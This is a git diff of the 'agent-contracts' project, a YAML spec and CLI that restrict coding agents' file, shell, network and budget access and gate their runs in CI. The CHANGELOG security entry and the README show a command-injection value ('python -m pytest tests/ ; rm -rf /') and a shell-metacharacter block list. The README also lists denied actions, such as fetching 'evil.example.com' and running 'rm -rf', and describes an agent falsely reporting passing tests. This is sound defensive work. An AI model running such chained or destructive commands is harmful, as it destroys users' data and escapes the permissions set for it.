diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 0968fd8..79fb20d 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -17,9 +17,19 @@ jobs: - uses: actions/setup-python@v5 with: python-version: ${{ matrix.python-version }} - - name: Install dependencies + - name: Install core (3.9) + if: matrix.python-version == '3.9' run: pip install -e ".[dev]" + - name: Install core + adapter extras (3.10+) + if: matrix.python-version != '3.9' + run: pip install -e ".[dev,claude,openai,langchain]" - name: Lint run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts - name: Test run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 1864eb1..8be8892 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -1,15 +1,56 @@ -name: Publish to PyPI +name: Release on: - release: - types: [published] + push: + tags: + - "v*" permissions: + contents: write id-token: write +concurrency: ${{ github.workflow }}-${{ github.ref }} + jobs: + verify: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Check repository hygiene + run: | + if git ls-files | grep -nE '(^|/)(AGENTS\.md|CLAUDE\.md|docs/plans/.*|\.omx/.*|\.pilot/.*|\.dev-session/.*|\.staff-engineer-state\.json|\.staff-engineer\.json|ROADMAP\.md)$'; then # ls-files prints files, never bare dirs, hence the /.* on directory entries; grep -E avoids depending on ripgrep being installed + echo "Tracked internal-only files found in public release tree." 
+ exit 1 + fi + - uses: actions/setup-python@v5 + with: + python-version: "3.12" + - name: Check tag version + run: | + TAG_VERSION="${GITHUB_REF_NAME#v}" + PKG_VERSION="$(python -c "from pathlib import Path; ns = {}; exec(Path('src/agent_contracts/_version.py').read_text(encoding='utf-8'), ns); print(ns['__version__'])")" + test "$TAG_VERSION" = "$PKG_VERSION" + - name: Install dependencies + run: python -m pip install -e ".[dev]" build twine + - name: Lint + run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts + - name: Test + run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml + python -m agent_contracts.cli check-compat examples/support_triage.yaml examples/support_triage.yaml + - name: Build package + run: python -m build + - name: Check distributions + run: python -m twine check dist/* + publish: runs-on: ubuntu-latest + needs: verify environment: pypi steps: - uses: actions/checkout@v4 @@ -17,8 +58,12 @@ jobs: with: python-version: "3.12" - name: Install build tools - run: pip install build + run: python -m pip install build - name: Build package run: python -m build - name: Publish to PyPI uses: pypa/gh-action-pypi-publish@release/v1 + - name: Create GitHub Release + uses: softprops/action-gh-release@v2 + with: + generate_release_notes: true diff --git a/.gitignore b/.gitignore index 2a7211b..53932f6 100644 --- a/.gitignore +++ b/.gitignore @@ -18,6 +18,11 @@ htmlcov/ .coverage .coverage.* *.lcov +.omx/ +.pilot/ .dev-session/ .staff-engineer-state.json +AGENTS.md +CLAUDE.md +docs/plans/ ROADMAP.md diff --git a/AGENT_CONTRACT.yaml b/AGENT_CONTRACT.yaml index 7ba7fdd..c22fb6e 100644 --- a/AGENT_CONTRACT.yaml +++ b/AGENT_CONTRACT.yaml @@ -1,219 +1,54 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# 
Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. +# Canonical coding/build repo contract agent_contract: "0.1.0" identity: - name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. - authors: - - Piyush Vyas + name: repo-build-agent + version: "0.1.0" + description: Fail-closed coding/build agent for this repository. contract: postconditions: - - name: produces_classification + - name: produces_output check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. + description: The run must produce a result object. - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - - - name: has_routing - check: 'output.routed_to is not None' - enforcement: sync_warn - severity: major - description: Should route to a team (warn if not). - slo: - target_rate: 0.99 - window: "24h" - - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). 
- slo: - target_rate: 0.95 - window: "7d" - -inputs: - schema: - type: object - required: - - ticket_id - - subject - - body - properties: - ticket_id: - type: string - subject: - type: string - body: - type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string - - preconditions: - - name: ticket_not_empty - check: "len(input.body) > 0" - description: Ticket body must not be empty. - -outputs: - schema: - type: object - required: - - priority - - category - properties: - priority: - type: string - enum: ["critical", "high", "medium", "low"] - category: - type: string - routed_to: - type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 + description: Required repo checks must pass before the run is green. effects: authorized: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - - notification.send_team - network: - - "https://api.ticketing.internal/*" - - "https://api.customers.internal/*" - - "https://kb.internal/*" - state_writes: - - "tickets.*" - - declared: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - network: - - "https://api.ticketing.internal/v2/tickets" - - "https://api.customers.internal/v1/lookup" - - "https://kb.internal/search" - state_writes: - - "tickets.priority" - - "tickets.assignment" + filesystem: + read: + - "src/**" + - "tests/**" + - "README.md" + - "pyproject.toml" + write: + - "src/**" + - "tests/**" + - "README.md" + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + - "python -m mypy *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.10 - max_tokens: 8000 - 
max_tool_calls: 15 - max_duration_seconds: 20.0 - -failure_model: - errors: - - name: ticket_not_found - retryable: false - description: The referenced ticket does not exist. - - - name: database_timeout - retryable: true - max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. - - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - notification-agent + max_cost_usd: 1.00 + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 observability: - traces: - enabled: true - sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. 
- - violation_events: - emit: true - destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/CHANGELOG.md b/CHANGELOG.md index 2128a4c..63b9741 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,47 +1,32 @@ # Changelog -All notable changes to this project will be documented in this file. +All notable changes to this project are tracked here. -The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), -and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). - -## [0.1.1] - 2026-03-26 +## [0.2.0] - 2026-04-06 ### Added -- **OpenAI Agents SDK Adapter** — `ContractRunHooks(RunHooks)` for effect gating via `on_tool_start`, token tracking via `on_llm_end`, postcondition evaluation via `on_agent_end`. Pinned to `openai-agents==0.8.4` -- **Claude Agent SDK Adapter** — `ContractHooks` with structured deny via PreToolUse (not exception). Cost/token extraction from ResultMessage. Pinned to `claude-agent-sdk==0.1.50` (Python 3.10+) -- **Precondition Evaluation** — `contract.preconditions[]` evaluated on input BEFORE agent runs. Reuses CEL-like expression evaluator. `PreconditionError` blocks execution before tokens are spent. 
Wired into `ContractEnforcer.check_preconditions()` and `@enforce_contract` decorator -- **GitHub Action** — `pyyush/agentcontracts@v0.1.1` composite action for CI contract validation -- **README Badge** — PyPI version and CI status badges -- 35 new tests (188 total) +- repo-local coding/build-agent positioning across the README, spec, examples, and canonical contract +- filesystem read/write authorization scopes +- shell command authorization scopes +- shell-command budgets +- verdict artifact emission and CLI verdict gating +- coding-agent trace bootstrap improvements +- coding/build-focused demo contracts and CI action semantics +- real-SDK integration tests for Claude, OpenAI, and LangChain adapters (run against the pinned SDK versions in CI) -## [0.1.0] - 2026-03-25 +### Changed -First release. YAML spec + Python SDK for production agent reliability. +- positioned the contract + CLI + verdict artifact + GitHub Action as the framework-agnostic, provider-agnostic enforcement surface; the CI verdict gate is the source of truth +- pinned framework adapter SDKs to exact versions: `claude-agent-sdk==0.1.56`, `openai-agents==0.13.5`, `langchain-core==1.2.26` +- gated all three adapter extras on Python 3.10+ (core remains 3.9+) +- fixed the OpenAI adapter import path (`from agents import RunHooks`) -### Added +### Removed + +- CrewAI adapter and `[crewai]` extra +- Pydantic AI adapter and `[pydantic-ai]` extra + +### Security -- **YAML Spec Schema** — JSON Schema (Draft 2020-12) covering 3 graduated tiers: - - Tier 0 (Standalone): identity + postconditions (4 fields to start) - - Tier 1 (Enforceable): + input/output schemas, effects authorization, budgets - - Tier 2 (Composable): + failure model, delegation, observability, SLOs -- **Contract Loading** — YAML parsing, schema validation, tier assessment, upgrade recommendations -- **Effect Authorization** — Default-deny tool gating with glob pattern matching. 
Effects split: `authorized` (intersection during delegation) vs `declared` (union for audit) -- **Budget Enforcement** — Thread-safe circuit breaker for cost, tokens, tool calls, and elapsed time. Raises `BudgetExceededError` when thresholds are hit -- **Postcondition Evaluator** — Safe CEL-like expression evaluator (no `eval()`). Supports `is None`, comparisons, membership tests, `len()`. Three enforcement timings: `sync_block`, `sync_warn`, `async_monitor` -- **Violation Events** — OTel-compatible structured events with contract_id, violated_clause, evidence, severity, and trace context. Emits to stdout, OpenTelemetry SDK, or callback -- **Runtime Enforcer** — Unified middleware wiring effects, budgets, postconditions, and violations. Works as decorator (`@enforce_contract`), context manager, or explicit API -- **Composition Checker** — Contract Differential analysis: schema gaps, capability gaps, budget gaps, effect violations between producer/consumer contracts -- **CLI** — Four commands: - - `aicontracts validate` — schema validation + tier + recommendations - - `aicontracts check-compat` — composition compatibility check - - `aicontracts init --from-trace` — generate contract skeleton from JSONL traces - - `aicontracts test --eval-suite` — run eval suite against postconditions -- **Framework Adapters** — LangChain (`ContractCallbackHandler`), CrewAI (`ContractGuard`), Pydantic AI (`ContractMiddleware`). 
Each under 200 lines, 3-line integration -- **MCP Extension Proposal** — `x-agent-contract` for tool-level preconditions, effect declarations, and trust metadata -- **Specification** — Human-readable spec narrative (`SPECIFICATION.md`) -- **Examples** — Reference contracts for all 3 tiers - -[0.1.1]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.1 -[0.1.0]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.0 +- shell command authorization now strict-rejects any command containing a shell metacharacter (`;`, `&`, `|`, `<`, `>`, `` ` ``, `$(`, newline). Closes a bypass where the fnmatch `*` wildcard would consume chaining operators and let an attacker append payloads after an allowlisted prefix (e.g. `python -m pytest tests/ ; rm -rf /`). The new `ShellMetacharacterError` is a subclass of `EffectDeniedError` so existing handlers keep working. Regression coverage in `tests/test_effects.py`. diff --git a/CLAUDE.md b/CLAUDE.md deleted file mode 100644 index 5874091..0000000 --- a/CLAUDE.md +++ /dev/null @@ -1,69 +0,0 @@ -# Agent Contracts - -## What This Is - -YAML spec + Python SDK for production agent reliability. Enforces cost control, tool-use security, and audit trails at the runtime boundary. - -## Structure - -``` -schemas/agent-contract.schema.json JSON Schema (all 3 tiers) -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ - __init__.py Public API surface - types.py Frozen dataclasses (Contract, etc.) 
- schema.py JSON Schema loading + validation - loader.py YAML loading → Contract objects - tier.py Tier assessment (0/1/2) + recommendations - effects.py Default-deny effect gating (glob patterns) - budgets.py Thread-safe budget tracker + circuit breaker - postconditions.py Safe expression evaluator (no eval()) - violations.py OTel-compatible violation events - enforcer.py Unified enforcement middleware - composition.py Contract Differential checker - cli.py CLI (validate, check-compat, init, test) - init_from_trace.py Generate contracts from JSONL traces - adapters/ - langchain.py LangChain CallbackHandler - crewai.py CrewAI ContractGuard - pydantic_ai.py Pydantic AI ContractMiddleware - openai_agents.py OpenAI Agents SDK RunHooks - claude_agent.py Claude Agent SDK ContractHooks -examples/ Reference contracts (Tier 0, 1, 2) -tests/ pytest test suite -``` - -## Conventions - -- **Python 3.9+** — uses `from __future__ import annotations` for modern syntax -- **Type-safe** — full type annotations, `frozen=True` dataclasses, `py.typed` marker -- **No eval()** — CEL-like expressions parsed by safe evaluator -- **Default-deny** — effects.authorized is an allowlist; unlisted = blocked -- **Thread-safe** — budget counters use `threading.Lock` -- **Minimal deps** — core requires only pyyaml, jsonschema, click -- **Framework adapters** — optional extras, <200 LOC each - -## Testing - -```bash -pip install -e ".[dev]" -pytest # Run all tests -pytest -v # Verbose -pytest --cov # With coverage -``` - -## Key Commands - -```bash -aicontracts validate contract.yaml -aicontracts check-compat a.yaml b.yaml -aicontracts init --from-trace traces.jsonl -aicontracts test contract.yaml --eval-suite evals/ -``` - -## Version - -- Current: 0.1.0 -- License: Apache-2.0 -- Author: Piyush Vyas diff --git a/README.md b/README.md index ec2c73c..98f6860 100644 --- a/README.md +++ b/README.md @@ -1,184 +1,271 @@ -# Agent Contracts +# agent-contracts 
-[![PyPI](https://img.shields.io/pypi/v/aicontracts)](https://pypi.org/project/aicontracts/) [![CI](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml/badge.svg)](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml) +[![PyPI](https://img.shields.io/pypi/v/aicontracts.svg)](https://pypi.org/project/aicontracts/) -**YAML spec + validation SDK for production agent reliability.** +**Declare what your coding agent may read, write, run, and spend — in one YAML file at the root of your repo. Enforced at runtime. Gated in CI. Fails closed.** -Cost control, tool-use security, and audit trails in under 30 minutes of integration. Works with any framework. Enforces at the runtime layer, not via prompts. +Works with Claude Code, Codex, Cursor, and any agent runtime — the core is framework- and provider-agnostic. Optional thin adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain. -``` +```bash pip install aicontracts +aicontracts init --template coding -o AGENT_CONTRACT.yaml +aicontracts validate AGENT_CONTRACT.yaml ``` -## The Problem +> **The CI verdict gate is the source of truth.** Every run emits one durable `verdict.json`. The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. + +## Why this, why now + +Coding agents are in production. Claude Code, Codex, Cursor Agent, Devin, Aider — every one of them runs with ambient authority over your repo: whatever the shell, filesystem, and network will let them do. The failure modes are no longer hypothetical: -Production agents fail at 41-87% rates. 97% of enterprises with agents in production haven't figured out how to scale them. 
The four pain points: +- agents editing files outside the intended scope +- destructive shell commands run on the wrong branch +- silent token-budget overruns mid-loop +- the agent reports "all tests passing" while `pytest` on disk is red — and you merge it +- unauthorized network calls and tool use buried in the trace -| Problem | Without Contracts | With Contracts | -|---------|------------------|----------------| -| **Cost runaway** | No ceiling on token spend | Budget circuit breaker per invocation | -| **Unauthorized tool use** | Ambient authority, prompt-bypassable | Default-deny allowlist at SDK layer | -| **No audit trail** | No record of authorized vs. actual | OTel-compatible violation events | -| **Silent regressions** | Prompt changes break things invisibly | Versioned contracts with SLO monitoring | +A repo shouldn't trust an agent any more than it trusts a random PR. `agent-contracts` is the smallest thing that gives a repo a declarative *"here is exactly what this agent may do"* — and a CI gate that refuses to merge runs that violated it. -## 5-Minute Quick Start +## What an agent cannot do under a contract -### 1. Write a Contract (or generate one) +| Agent attempts | Without a contract | With agent-contracts | +|---|---|---| +| `Write(".env", ...)` | silently succeeds | not in `filesystem.write` → denied | +| `Bash("rm -rf node_modules")` | runs | not in `shell.commands` → denied | +| `Bash("python -m pytest tests/ ; rm -rf /")` | runs | shell metacharacter → denied | +| Fetches `https://evil.example.com` | runs | not in `network` → denied | +| Burns 200k tokens in a loop | silent | hits `max_tokens: 50000` → blocked | +| Reports "all tests passing" while pytest is red | merges green | postcondition fails → verdict: `fail`, CI gate red | + +## Quick start + +### 1. 
Generate a starter contract + +```bash +aicontracts init --template coding -o AGENT_CONTRACT.yaml +``` + +This drops a ready-to-use coding-agent contract in your repo: ```yaml -# AGENT_CONTRACT.yaml agent_contract: "0.1.0" - identity: - name: my-agent - version: "1.0.0" - -contract: - postconditions: - - name: produces_output - check: "output is not None" - enforcement: sync_block - severity: critical + name: repo-build-agent + version: "0.1.0" effects: authorized: - tools: [search, database.read] - network: ["https://api.example.com/*"] + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.50 - max_tokens: 10000 + max_tokens: 50000 max_tool_calls: 20 -``` + max_shell_commands: 10 + max_duration_seconds: 1800 -Or generate from observed behavior: +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" -```bash -aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" ``` -### 2. Enforce at Runtime - -```python -from agent_contracts import load_contract, ContractEnforcer +Empty `tools`, `network`, and `state_writes` lists mean *default-deny*: the agent cannot use any tool, hit any network endpoint, or write to any tracked state unless you list it. -contract = load_contract("AGENT_CONTRACT.yaml") +### 2. 
Hook it into your agent runtime -with ContractEnforcer(contract) as enforcer: - # Each tool call is checked against the allowlist and budget - enforcer.check_tool_call("search") # OK - in allowlist - enforcer.check_tool_call("delete_all") # BLOCKED - not authorized +The Claude Agent SDK adapter forwards every tool call into the enforcer — no manual instrumentation: - enforcer.add_cost(0.05) # Tracked against max_cost_usd - enforcer.add_tokens(500) # Tracked against max_tokens +```python +from agent_contracts import load_contract +from agent_contracts.adapters.claude_agent import ContractHooks +from claude_agent_sdk import ClaudeAgentOptions, query - # Postconditions evaluated after execution - enforcer.evaluate_postconditions(result) -``` +contract = load_contract("AGENT_CONTRACT.yaml") +hooks = ContractHooks(contract) -### 3. Framework Integration (3 lines) +options = ClaudeAgentOptions(hooks=hooks.get_hooks_config()) +async for message in query(prompt="refactor src/app.py", options=options): + if hasattr(message, "total_cost_usd"): + hooks.track_result(message) -**LangChain:** -```python -from agent_contracts.adapters.langchain import ContractCallbackHandler -handler = ContractCallbackHandler.from_file("AGENT_CONTRACT.yaml") -agent.invoke({"input": query}, config={"callbacks": [handler]}) +verdict = hooks.enforcer.finalize_run(output={"status": "done"}) +print(verdict.outcome) # pass | warn | blocked | fail ``` -**CrewAI:** -```python -from agent_contracts.adapters.crewai import ContractGuard -guard = ContractGuard.from_file("AGENT_CONTRACT.yaml") -result = guard.execute(crew, inputs={"query": query}) -``` +OpenAI Agents SDK and LangChain adapters follow the same pattern. For agents *without* an SDK hook surface (bash drivers, custom subprocess loops), the verdict gate in step 3 still catches every violation post-hoc. 
-**Pydantic AI:** -```python -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -middleware = ContractMiddleware.from_file("AGENT_CONTRACT.yaml") -result = await middleware.run(agent, prompt) -``` +### 3. Gate the verdict in CI -**OpenAI Agents SDK:** -```python -from agent_contracts.adapters.openai_agents import ContractRunHooks -hooks = ContractRunHooks.from_file("AGENT_CONTRACT.yaml") -result = await Runner.run(agent, "prompt", run_hooks=[hooks]) +```bash +aicontracts validate AGENT_CONTRACT.yaml +aicontracts check-verdict .agent-contracts/runs//verdict.json ``` -**Claude Agent SDK:** -```python -from agent_contracts.adapters.claude_agent import ContractHooks -hooks = ContractHooks.from_file("AGENT_CONTRACT.yaml") -# Pass hooks.pre_tool_use to ClaudeAgentOptions +`check-verdict` exits non-zero on `blocked` or `fail`. Wire it into a required GitHub check and the merge cannot proceed without an honest contract pass. + +## Verdict artifacts + +Every meaningful run can emit one compact artifact, for example: + +```json +{ + "run_id": "...", + "outcome": "pass", + "checks": [ + {"name": "pytest", "status": "pass", "exit_code": 0}, + {"name": "ruff", "status": "pass", "exit_code": 0} + ], + "budgets": { + "tokens": 12345, + "shell_commands": 2, + "duration_seconds": 18.2 + }, + "violations": [] +} ``` -## Three Tiers +Outcome semantics: -Start simple, add guarantees as production demands. 
- -| Tier | Fields | Value | -|------|--------|-------| -| **0: Standalone** | identity + 1 postcondition (4 fields) | Self-documentation, local validation | -| **1: Enforceable** | + schemas, effects, budgets | Cost control, tool gating, I/O validation | -| **2: Composable** | + failure model, delegation, observability, SLOs | Multi-agent composition, audit trails, canary gates | +- `pass` — required checks and blocking clauses passed +- `warn` — allowed to proceed, but warnings were recorded +- `blocked` — an operation was denied during the run +- `fail` — the run completed, but required checks or critical postconditions failed ## CLI ```bash -# Validate a contract +# Validate a contract and show coding/build surfaces aicontracts validate AGENT_CONTRACT.yaml +# Generate a coding-agent starter template +aicontracts init --template coding -o AGENT_CONTRACT.yaml + +# Bootstrap from traces +aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml + # Check composition compatibility aicontracts check-compat producer.yaml consumer.yaml -# Generate from execution traces -aicontracts init --from-trace traces.jsonl - -# Run eval suite against postconditions -aicontracts test AGENT_CONTRACT.yaml --eval-suite tests/ +# Gate a verdict artifact in CI (exits non-zero on blocked/fail) +aicontracts check-verdict .agent-contracts/runs/<run_id>/verdict.json ``` -## Key Design Decisions +## Framework adapters (optional) + +The core (contract, CLI, verdict artifact, GitHub Action) is framework-agnostic and provider-agnostic. Adapters are optional ergonomic helpers that wire in-runtime hook calls into the same enforcer. Each is pinned to a specific SDK version and tested against the real SDK in CI. 
+ +| Framework | Extra | Pinned SDK | +|---|---|---| +| Claude Agent SDK | `aicontracts[claude]` | `claude-agent-sdk==0.1.56` | +| OpenAI Agents SDK | `aicontracts[openai]` | `openai-agents==0.13.5` | +| LangChain | `aicontracts[langchain]` | `langchain-core==1.2.26` | + +All three SDK extras require Python 3.10+. The core package supports Python 3.9+. + +In-runtime adapters add hard-stop coverage where the host exposes a pre-execution hook, but enforcement completeness still depends on the host's hook surface. The CI verdict gate is what makes enforcement total: every merge runs the same evaluator against the same contract, regardless of which framework, model, or runtime produced the run. + +### v0.3.0 roadmap + +A companion `@aicontracts/*` TypeScript package with adapters for Vercel AI SDK, Claude TypeScript SDK, and OpenAI Agents JS is planned for v0.3.0. + +## Shell command matching: threat model -1. **Spec + SDK, not protocol or platform** — the OpenAPI model -2. **YAML primary** — JSON Schema validation, CEL-like inline expressions -3. **Graduated tiers** — Tier 0 is 4 fields, not 40 -4. **Effects: authorized vs. declared** — intersection for delegation, union for audit -5. **Enforcement at SDK layer** — never in prompts (prompt injection can't bypass) -6. **MCP extension, not fork** — `x-agent-contract` on tool definitions +Shell command authorization in v0.2.x is **strict reject + glob match**. Any command containing a shell metacharacter — `;` `&` `|` `<` `>` `` ` `` `$(` or a newline — is denied outright, even if its prefix matches an allowlisted pattern. This rules out command chaining, redirection, process substitution, and command injection at the contract layer. -## Positioning +```yaml +shell: + commands: + - "python -m pytest *" # matches: python -m pytest tests/test_app.py + # denied: python -m pytest tests/ ; rm -rf / +``` -MCP governs how agents connect. Agent Skills govern what agents advertise. -A2A governs how agents find each other. 
**Agent Contracts govern what agents -must do, must not do, and what happens when they fail.** +The trade-off: legitimate piped commands like `cat file | head` cannot be expressed as a single allowlist entry today. Wrap them in a script the contract authorizes by name, or split them into two records. v0.3.x will introduce a `shlex`-based token matcher that can express richer command shapes safely without weakening the fail-closed property. -## Project Structure +## GitHub Action +```yaml +- uses: pyyush/agentcontracts@v0.2.0 + with: + contract: AGENT_CONTRACT.yaml + verdict: .agent-contracts/runs/${{ github.run_id }}/verdict.json ``` -schemas/ JSON Schema for AGENT_CONTRACT.yaml -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ Python SDK - loader.py Contract loading + validation - enforcer.py Runtime enforcement middleware - effects.py Default-deny effect gating - budgets.py Budget tracking + circuit breaker - postconditions.py Postcondition evaluation - violations.py OTel-compatible violation events - composition.py Contract Differential checker - cli.py CLI tool - adapters/ Framework adapters -examples/ Reference contracts (Tier 0, 1, 2) + +The action validates contracts and, when a verdict path is provided, fails the workflow for `blocked` or `fail` outcomes. 
+ +## Canonical examples + +- `AGENT_CONTRACT.yaml` — canonical repo-build agent contract +- `examples/repo_build_agent.yaml` — reference coding/build repo contract +- `examples/demo_blocked_file_write.yaml` — protected-file demo +- `examples/demo_blocked_command.yaml` — forbidden-command demo +- `examples/demo_failed_checks.yaml` — red-checks demo +- `examples/support_triage.yaml` — broader tier-2 example retained for composition docs + +## Project structure + +```text +schemas/ JSON Schema for AGENT_CONTRACT.yaml +spec/SPECIFICATION.md Human-readable specification +src/agent_contracts/ Python SDK + cli.py CLI entry point + loader.py YAML loading + validation + types.py Dataclasses / type model + effects.py Tool, filesystem, network, and shell authorization + budgets.py Budget tracking + postconditions.py Postcondition evaluation + enforcer.py Runtime enforcement + verdict artifacts + init_from_trace.py Bootstrap from traces + adapters/ Host/framework integrations +examples/ Reference contracts and demos +action.yml GitHub composite action +AGENT_CONTRACT.yaml Canonical coding-agent contract ``` -## License +## Why YAML, not Markdown? -Apache-2.0 +A contract is a machine-enforceable artifact, not documentation. Markdown is prose; YAML is structure. The difference matters when the same file has to be parsed by a CLI, an in-runtime enforcer, and a CI gate — and produce the same verdict every time. + +- **Deterministic parse.** YAML has a JSON Schema (`schemas/agent-contract.schema.json`). Every runtime, in any language, produces the same parse tree from the same file. Markdown would require an LLM or a brittle regex extractor, and the verdict would depend on which extractor you used. +- **Fail-closed needs typed fields.** `effects.authorized.filesystem.write: ["src/**"]` is a list of glob patterns. There is no ambiguity about whether `tests/secret.env` is in scope. 
A Markdown bullet under "## Files the agent can write" is interpretation, and interpretation is exactly what coding-agent guardrails cannot afford. +- **Diff-friendly review.** YAML diffs per field. A reviewer can see "this PR added `python -m mypy *` to authorized shell commands" as a one-line change. Markdown prose diffs are noisy and merge conflicts on policy text are hard to reason about. +- **Versioned schema.** `agent_contract: "0.1.0"` declares the spec version. Older runtimes can refuse contracts they don't understand; newer runtimes can ignore unknown fields under the `x-` prefix. Markdown has no equivalent. +- **Cloud-native muscle memory.** kubectl, GitHub Actions, OpenAPI, Helm, GitLab CI, ArgoCD — every fail-closed policy artifact in the ecosystem is YAML or JSON. Engineers already know how to author, lint, and review it. +- **Still legible.** For the canonical coding-agent case (one identity block, one effects block, a few postconditions), the YAML is short enough to read without ceremony. The quick-start contract above fits on one screen. + +Markdown is the right format for the *human spec* (`spec/SPECIFICATION.md`) and for prose explanations of how the system works. It is not the right format for the file the enforcer reads on every run. -## Author +## Scope and non-goals -Piyush Vyas +This repo is intentionally narrow. 
+ +In scope: + +- repo-local contracts for coding/build agents +- file, shell, tool, network, and budget boundaries +- runtime + CI gating +- durable verdict artifacts + +Out of scope for the current release: + +- hosted control planes +- compliance dashboards +- generic agent governance positioning +- speculative multi-agent infrastructure + +## License + +Apache-2.0 diff --git a/action.yml b/action.yml index b4b1c1c..4e163cb 100644 --- a/action.yml +++ b/action.yml @@ -1,5 +1,5 @@ -name: 'AI Contracts Validate' -description: 'Validate agent contracts against the AI Contracts spec' +name: 'Agent Contracts Gate' +description: 'Validate repo-local agent contracts and optionally gate a run verdict artifact' branding: icon: 'shield' color: 'blue' @@ -8,8 +8,16 @@ inputs: contract: description: 'Path to contract YAML file(s), space-separated' required: true + verdict: + description: 'Optional verdict artifact path to gate' + required: false + default: '' fail-on-warning: - description: 'Fail if contract has upgrade recommendations' + description: 'Fail if contract validation returns upgrade recommendations' + required: false + default: 'false' + fail-on-warn-outcome: + description: 'Fail if the verdict outcome is warn' required: false default: 'false' python-version: @@ -20,10 +28,13 @@ inputs: outputs: outcome: description: 'pass or fail' - value: ${{ steps.validate.outputs.outcome }} + value: ${{ steps.gate.outputs.outcome }} tier: description: 'Contract tier (0, 1, or 2)' - value: ${{ steps.validate.outputs.tier }} + value: ${{ steps.gate.outputs.tier }} + verdict-outcome: + description: 'Verdict outcome when a verdict artifact is provided' + value: ${{ steps.gate.outputs.verdict_outcome }} runs: using: 'composite' @@ -34,25 +45,46 @@ runs: - name: Install aicontracts shell: bash - run: pip install aicontracts + run: python -m pip install aicontracts==0.2.0 - - name: Validate contracts - id: validate + - name: Validate contract and verdict + id: gate shell: bash 
